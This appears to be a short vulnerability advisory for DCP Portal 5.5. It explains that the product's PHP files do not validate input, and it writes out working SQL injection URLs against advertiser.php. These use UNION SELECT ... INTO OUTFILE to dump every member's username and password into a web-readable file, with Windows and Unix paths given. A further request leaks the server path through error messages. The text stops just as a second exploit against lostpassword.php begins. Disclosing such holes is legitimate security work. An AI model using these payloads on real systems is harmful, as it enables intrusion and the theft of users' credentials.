DCP Portal - 5.5 holes

Never use this product if you have turned off magic_quotes_gpc. And this product won't work anyway if you
have turned off register_globals.

All the files in the product, dont check for integrity of variables. You can easily exploit this using some
SQL Injection techniques. For example, if you want to get username/password of all the users, you can
exploit advertiser.php. 

Open it like,

http://localhost/dcp/advertiser.php?adv_logged=1&username=1&password=qwe' or 1=1 UNION select
uid,name,password,surname,job,email from dcp5_members into outfile 'c:/apache2/htdocs/dcpad.txt

This is for windows, if web-server is running on *nix, then you could enter something like,

http://localhost/dcp/advertiser.php?adv_logged=1&username=1&password=qwe' or 1=1 UNION select
uid,name,password,surname,job,email from dcp5_members into outfile '/var/www/html/dcpad.txt

In this cases, you will need to enter the absolute path. For that, run the follwing

http://localhost/dcp/advertiser.php?adv_logged=1&username=1&password=' and that will show the
path to the sever if they have turned on display_errors in php.ini.

That's all ! Notice that here we are using UNION function in query. For that, the host should be running
version MySQL 4.x. Well, if it's not running 4.x, No problem, we have another file !

This time it's lostpassword.php.

Open it like,